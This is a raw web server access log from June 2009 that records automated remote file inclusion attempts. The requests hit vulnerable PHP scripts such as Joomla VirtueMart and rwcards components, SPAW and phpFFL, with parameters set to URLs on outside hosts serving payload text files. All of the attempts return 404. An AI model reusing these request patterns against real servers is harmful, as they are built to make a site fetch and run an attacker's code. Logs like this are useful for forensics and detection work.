168.143.19.89 - - [04/Jun/2009:04:29:18 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:04:29:25 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:04:29:25 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 366 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:04:29:26 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 366 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:04:29:40 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:04:29:40 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:04:29:40 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 366 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:04:29:44 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 366 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:04:30:43 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 366 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:04:42:12 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:04:42:12 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:04:42:12 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:04:42:35 -0500] "GET /logs/access_log.1235001600//admin/spaw/spaw_control.class.php?spaw_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:04:45:48 -0500] "GET /logs/access_log.1238371200//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:04:45:48 -0500] "GET //skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:04:45:48 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:04:45:48 -0500] "GET /logs/access_log.1238284800//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:04:45:55 -0500] "GET //skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:04:45:55 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:04:45:55 -0500] "GET /logs/access_log.1238284800//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:04:46:00 -0500] "GET /logs/access_log.1238371200//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:04:46:16 -0500] "GET /logs/access_log.1241568000//admin/spaw/spaw_control.class.php?spaw_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:04:52:33 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:04:52:33 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:04:52:33 -0500] "GET /logs/access_log.1239667200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:04:53:46 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:04:53:46 -0500] "GET /logs/access_log.1239667200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:04:53:46 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:04:54:46 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:04:54:46 -0500] "GET /errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:04:54:46 -0500] "GET /logs/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:04:55:09 -0500] "GET /errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:04:55:10 -0500] "GET /logs/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:04:55:10 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:04:59:17 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:04:59:17 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:04:59:17 -0500] "GET /logs/access_log.1239667200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:04:59:20 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:04:59:20 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:04:59:20 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:04:59:58 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:04:59:58 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:04:59:58 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:05:00:04 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:05:00:04 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:05:00:05 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:05:00:07 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:05:00:38 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:05:00:56 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
190.120.227.18 - - [04/Jun/2009:05:01:52 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
190.120.227.18 - - [04/Jun/2009:05:01:52 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
190.120.227.18 - - [04/Jun/2009:05:01:52 -0500] "GET /logs/access_log.1239667200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:03:20 -0500] "GET ///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:03:20 -0500] "GET /logs/access_log.1239408000///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:03:20 -0500] "GET /logs///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:03:25 -0500] "GET /logs/access_log.1240444800///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:03:27 -0500] "GET ///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:03:27 -0500] "GET /logs/access_log.1239408000///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:03:27 -0500] "GET /logs///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:03:33 -0500] "GET /logs/access_log.1240444800///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:05:07:43 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:05:07:43 -0500] "GET /logs/access_log.1239667200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:05:07:43 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:08:21 -0500] "GET /logs/access_log.1231286400///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:08:21 -0500] "GET /logs///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:08:21 -0500] "GET ///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:08:33 -0500] "GET /logs/access_log.1231804800///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:09:11 -0500] "GET /logs///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:09:11 -0500] "GET ///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:09:11 -0500] "GET /logs/access_log.1231286400///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.51.133.202 - - [04/Jun/2009:05:09:20 -0500] "GET /logs/access_log.1231804800///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.106.231 - - [04/Jun/2009:05:10:36 -0500] "GET /logs/access_log.1182038400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.189.9.11 - - [04/Jun/2009:05:19:26 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
213.189.9.11 - - [04/Jun/2009:05:19:26 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
65.55.107.180 - - [04/Jun/2009:05:19:37 -0500] "GET /logs/access_log.1118448000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.222.11.130 - - [04/Jun/2009:05:19:43 -0500] "GET /logs/access_log.1231286400///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.222.11.130 - - [04/Jun/2009:05:19:44 -0500] "GET ///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.222.11.130 - - [04/Jun/2009:05:19:45 -0500] "GET /logs///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:05:20:33 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:05:20:33 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:05:20:33 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
83.222.11.130 - - [04/Jun/2009:05:20:35 -0500] "GET ///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.222.11.130 - - [04/Jun/2009:05:20:35 -0500] "GET /logs///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
83.222.11.130 - - [04/Jun/2009:05:20:36 -0500] "GET /logs/access_log.1231286400///errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:20:43 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:20:43 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:20:43 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:05:21:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:05:21:23 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:05:21:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
213.189.9.11 - - [04/Jun/2009:05:21:24 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
213.189.9.11 - - [04/Jun/2009:05:21:24 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
81.196.124.252 - - [04/Jun/2009:05:21:53 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:05:21:53 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:05:21:53 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:23:00 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:23:04 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:23:07 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:05:23:11 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:23:40 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:23:40 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:23:41 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:24:18 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:24:19 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:24:19 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
122.200.150.250 - - [04/Jun/2009:05:25:19 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.200.150.250 - - [04/Jun/2009:05:25:19 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
122.200.150.250 - - [04/Jun/2009:05:25:19 -0500] "GET /logs/access_log.1239667200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
204.3.160.214 - - [04/Jun/2009:05:26:30 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.0" 404 322 "-""Mozilla/5.0"
204.3.160.214 - - [04/Jun/2009:05:26:30 -0500] "GET /logs/access_log.1237680000/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.0" 404 344 "-""Mozilla/5.0"
204.3.160.214 - - [04/Jun/2009:05:26:30 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.0" 404 317 "-""Mozilla/5.0"
65.55.106.184 - - [04/Jun/2009:05:29:37 -0500] "GET /logs/access_log.1115337600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.255.37.201 - - [04/Jun/2009:05:29:53 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.255.37.201 - - [04/Jun/2009:05:29:53 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.255.37.201 - - [04/Jun/2009:05:29:53 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.255.37.201 - - [04/Jun/2009:05:30:04 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.255.37.201 - - [04/Jun/2009:05:30:04 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.255.37.201 - - [04/Jun/2009:05:30:04 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
222.255.37.201 - - [04/Jun/2009:05:31:17 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.144 - - [04/Jun/2009:05:33:36 -0500] "GET /logs/access_log.1151884800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.251.225.77 - - [04/Jun/2009:05:33:39 -0500] "GET //skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:05:33:39 -0500] "GET /logs/access_log.1230940800//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:05:33:39 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:05:33:39 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:05:33:41 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:05:33:41 -0500] "GET //skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:05:33:41 -0500] "GET /logs/access_log.1230940800//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:05:33:42 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/login.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
